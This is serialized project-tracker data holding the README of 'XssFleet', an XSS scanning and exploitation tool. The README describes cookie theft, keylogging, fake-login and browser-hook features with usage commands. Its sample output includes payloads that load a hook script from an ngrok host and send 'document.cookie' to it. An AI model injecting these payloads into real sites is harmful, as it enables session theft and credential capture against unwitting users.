[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76171":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":12,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":19,"archived":20,"fork":20,"defaultBranch":21,"hasWiki":22,"hasPages":20,"topics":23,"createdAt":9,"pushedAt":9,"updatedAt":24,"readmeContent":25,"aiSummary":26,"trendingCount":14,"starSnapshotCount":14,"syncStatus":27,"lastSyncTime":28,"discoverSource":29},76171,"XssFleet","jhli07\u002FXssFleet","jhli07","XssFleet is a professional XSS (Cross-Site Scripting) vulnerability automated penetration testing tool. ",null,"Python",119,7,18,0,1,36,3,51.81,"MIT License",false,"main",true,[],"2026-06-12 04:01:20","# XssFleet\n\n![XssFleet](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FXssFleet-v2.0.0-blue.svg)\n![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FPython-3.8%2B-green.svg)\n![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-orange.svg)\n\n## Overview\n\nXssFleet is a comprehensive XSS (Cross-Site Scripting) vulnerability automated penetration testing tool. It integrates advanced detection algorithms from XSStrike and exploitation capabilities inspired by BeEF, providing a complete solution for security professionals to detect, verify, and exploit XSS vulnerabilities.\n\n```\n  _   _   _____   _____   ______   _        ______   ______   ______   _______ \n | \\ \u002F | \u002F ____| \u002F ____| |  ____| | |      |  ____| |  ____| |  ____| |__   __|\n |  \\\u002F  | | (___   \\___ \\  | |___   | |      | |___   | |___   | |___      | |   \n |  \u002F\\  |  \\___ \\   ___) | |  ___|  | |      |  ___|  |  ___|  |  ___|     | |   \n | \u002F \\ |  ____) | |____\u002F  | |      | |____  | |____  | |____  | |____     | |   \n |_\u002F  \\_| |_____\u002F |_____|  |_|      |______| |______| |______| |______|    |_|   \n\n                    [+] Version: v2.0.0\n                   XSS Vulnerability Automatic Scanner\n\n[*] Starting scan for: http:\u002F\u002Fexample.com\u002Fpage?keyword=test\n[*] Auto-detected parameters: keyword\n[*] Running XSS detection...\n  [*] Testing parameter: keyword\n    [+] Sending probe to detect reflection points...\n    [+] Analyzing response, found 2 reflection point(s)\n    [+] Generated 5159 payloads based on context\n    [+] Testing top 10 payloads...\n    [+] Found 10 potential vulnerabilities in 'keyword'\n\n[+] Found 10 potential vulnerabilities!\n```\n\n## Features\n\n### Core Detection Capabilities\n- **Reflected XSS Detection**: Automatically scan for reflected XSS in URL parameters\n- **Stored XSS Detection**: Detect stored XSS in databases and file-based storage\n- **DOM-based XSS Detection**: Analyze JavaScript code for DOM manipulation vulnerabilities\n- **HTTP Header XSS**: Scan headers (Referer, User-Agent, Cookie) for XSS vulnerabilities\n- **WAF Bypass**: Advanced bypass techniques to evade web application firewalls\n\n### Exploitation Features\n- **Browser Hook**: Hook victim browsers for persistent control\n- **Cookie Theft**: Steal session cookies from hooked browsers\n- **Keylogger**: Capture keystrokes from target browsers\n- **Page Information Gathering**: Collect URL, title, localStorage, and sessionStorage\n- **Remote Command Execution**: Execute arbitrary JavaScript on hooked browsers\n- **ngrok Integration**: Automatic public tunnel creation for payload delivery\n\n### Verification & Reporting\n- **Browser Automation**: Verify vulnerabilities using real browsers\n- **Detailed Reports**: Generate comprehensive HTML and JSON reports\n- **Payload Management**: Organized payload repository with multiple categories\n- **Tamper Scripts**: Support for payload modification techniques\n\n## Installation\n\n### Prerequisites\n- Python 3.8 or higher\n- pip package manager\n\n### Install Dependencies\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fxssfleet\u002Fxssfleet.git\ncd xssfleet\npip install -r requirements.txt\n```\n\n### Optional Dependencies\n```bash\n# For browser verification\npip install selenium\n\n# For ngrok tunneling\npip install pyngrok\n```\n\n## Quick Start\n\n### Basic Scan\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Ftarget.com\u002Fsearch?q=test\"\n```\n\n### Deep Scan Mode\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Ftarget.com\u002Fpage\" -d\n```\n\n### POST Request Scan\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Ftarget.com\u002Flogin\" --method POST --data \"username=test&password=test\"\n```\n\n### Exploitation Mode\n```bash\npython xssfleet\u002Fxssfleet.py --exploit\n```\n\n### Batch Scan\n```bash\npython xssfleet\u002Fxssfleet.py -m urls.txt --deep\n```\n\n## Usage Examples\n\n### Full Vulnerability Scan\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Fexample.com\u002Fvulnerable?q=1\" -d -v --verify\n```\n\n### WAF Bypass with Tamper Scripts\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Ftarget.com\u002Fsearch?q=test\" --tamper=space2comment,base64encode\n```\n\n### HTTP Header Scan\n```bash\npython xssfleet\u002Fxssfleet.py -u \"http:\u002F\u002Ftarget.com\u002Fpage\" --headers-scan --cookie \"session=abc123\"\n```\n\n## Exploitation Workflow\n\n```\n[*] Loading available payloads...\n\nAvailable payload types:\n  cookie_theft     - Cookie Theft\n                     Steal browser cookies via XSS\n  keylogger        - Keylogger\n                     Capture keystrokes from the target\n  redirect         - Redirect\n                     Redirect victim to malicious site\n  clipboard        - Clipboard Theft\n                     Read clipboard contents\n  fake_login       - Fake Login\n                     Display fake login form to steal credentials\n  reverse_shell    - Reverse Shell\n                     Full browser control with command execution\n\nSelect payload type: cookie_theft\n\nVulnerability context types:\n  html             - HTML tag context - Payload injected directly into HTML tags\n  attribute        - HTML attribute context - Payload injected into HTML attributes\n  javascript       - JavaScript context - Payload injected into JavaScript code\n  dom_based        - DOM-based XSS - Payload executed via DOM manipulation\n  url_param        - URL parameter context - Payload as URL parameter value\n\nTip: If you don't know the context, use 'auto' to generate multiple alternative payloads\nSelect vulnerability context: auto\n\n[*] Starting XSS exploitation environment...\n[*] Found ngrok at: C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\ngrok.exe\n\n[+] XSS exploitation environment ready!\n\nngrok URL:\nhttps:\u002F\u002Fabc123.ngrok.io\n\nGenerated attack payloads (context: auto):\n[1] \u003Cscript src=https:\u002F\u002Fabc123.ngrok.io\u002Fhook>\u003C\u002Fscript>\n[2] \u003Cimg src=x onerror=eval(atob('...'))>\n[3] \u003Csvg onload=fetch('https:\u002F\u002Fabc123.ngrok.io\u002Fhook?c='+document.cookie)>\n```\n\n1. **Start Exploitation Mode**\n```bash\npython xssfleet\u002Fxssfleet.py --exploit\n```\n\n2. **Select Payload Type**\n```\nAvailable payload types:\n  cookie_theft     - Steal browser cookies via XSS\n  keylogger        - Capture keystrokes from the target\n  redirect         - Redirect victim to malicious site\n  clipboard        - Read clipboard contents\n  fake_login       - Display fake login form\n  reverse_shell    - Full browser control\n```\n\n3. **Inject Payload**\nCopy the generated payload and inject it into the target vulnerability.\n\n4. **Monitor Hooked Browsers**\n```\nSelect action:\n  1 - Show captured data\n  2 - Generate new payloads\n  3 - Stop exploitation\n```\n\n## Command Line Options\n\n| Option | Description |\n|--------|-------------|\n| `-u, --url` | Target URL |\n| `-m, --batch` | Load URLs from file |\n| `-p, --parameter` | Test specific parameter |\n| `-d, --deep` | Enable deep scan mode |\n| `-b, --bypass` | Enable WAF bypass |\n| `--method` | HTTP method (GET\u002FPOST) |\n| `--data` | POST data string |\n| `--headers` | Custom HTTP headers |\n| `--cookie` | Cookie string |\n| `--headers-scan` | Scan HTTP headers for XSS |\n| `--tamper` | Tamper scripts (comma-separated) |\n| `--verify` | Verify with browser automation |\n| `--browser` | Show browser during verification |\n| `-o, --output` | Output directory for reports |\n| `-v, --verbose` | Verbose output |\n| `--exploit` | Enable XSS exploitation mode |\n| `--port` | Listener port (default: 8080) |\n| `-h, --help` | Show help message |\n\n## Project Structure\n\n```\nxssfleet\u002F\n├── core\u002F\n│   ├── detector.py        # XSS detection engine\n│   ├── exploiter.py       # XSS exploitation module\n│   ├── bypasser.py        # WAF bypass techniques\n│   ├── verifier.py        # Browser verification\n│   ├── payload_manager.py # Payload management\n│   └── ngrok_manager.py   # ngrok integration\n├── modules\u002F\n│   ├── reflected.py       # Reflected XSS module\n│   ├── stored.py          # Stored XSS module\n│   └── dom.py             # DOM-based XSS module\n├── payloads\u002F\n│   └── repository.py      # Payload repository\n├── utils\u002F\n│   ├── http.py            # HTTP request handling\n│   ├── report.py          # Report generation\n│   ├── logger.py          # Logging utilities\n│   └── encoder.py         # Encoding utilities\n└── xssfleet.py            # Main entry point\n```\n\n## Supported Payload Categories\n\n- **Basic Scripts**: `\u003Cscript>`, `\u003Cimg>`, `\u003Csvg>` tags\n- **Event Handlers**: `onload`, `onmouseover`, `onclick`, `onfocus`\n- **Attribute Injection**: `href`, `src`, `action` attributes\n- **Unicode Encoding**: HTML entity encoding bypass\n- **Double-Write**: Bypass filters via keyword repetition\n- **Case Variation**: Mixed case bypass techniques\n\n## Security Disclaimer\n\nThis tool is for **authorized security testing only**.\n\nBy using XssFleet, you agree that:\n1. You have obtained explicit written authorization from the target owner\n2. You will not use this tool for unauthorized activities\n3. You comply with all applicable laws and regulations\n4. You accept full responsibility for your actions\n\nUnauthorized access or attacks may be illegal. Use responsibly.\n\n## Contributing\n\nContributions are welcome! Please feel free to submit issues and pull requests.\n\n## License\n\nXssFleet is released under the MIT License. See LICENSE file for details.\n\n## Credits\n\n- **XSStrike**: Advanced XSS detection algorithms\n- **BeEF**: Browser exploitation framework concepts\n- **Selenium**: Browser automation for verification\n\n---\n\n## Star History\n\n\u003Ca href=\"https:\u002F\u002Fwww.star-history.com\u002F?repos=jhli07%2FXssFleet&type=date&legend=top-left\">\n \u003Cpicture>\n   \u003Csource media=\"(prefers-color-scheme: dark)\" srcset=\"https:\u002F\u002Fapi.star-history.com\u002Fchart?repos=jhli07\u002FXssFleet&type=date&theme=dark&legend=top-left\" \u002F>\n   \u003Csource media=\"(prefers-color-scheme: light)\" srcset=\"https:\u002F\u002Fapi.star-history.com\u002Fchart?repos=jhli07\u002FXssFleet&type=date&legend=top-left\" \u002F>\n   \u003Cimg alt=\"Star History Chart\" src=\"https:\u002F\u002Fapi.star-history.com\u002Fchart?repos=jhli07\u002FXssFleet&type=date&legend=top-left\" \u002F>\n \u003C\u002Fpicture>\n\u003C\u002Fa>\n","XssFleet 是一款专业的 XSS（跨站脚本攻击）漏洞自动化渗透测试工具。它集成了来自 XSStrike 的高级检测算法和 BeEF 启发的利用功能，能够全面检测、验证并利用 XSS 漏洞。该工具支持反射型、存储型以及基于 DOM 的 XSS 检测，并具备绕过 WAF 的能力。此外，XssFleet 还提供了一系列浏览器挂钩功能如 Cookie 盗取、键盘记录等，增强了其在实际场景中的应用价值。适合安全研究人员和技术人员用于网站安全评估与加固工作。",2,"2026-06-11 03:54:43","CREATED_QUERY"]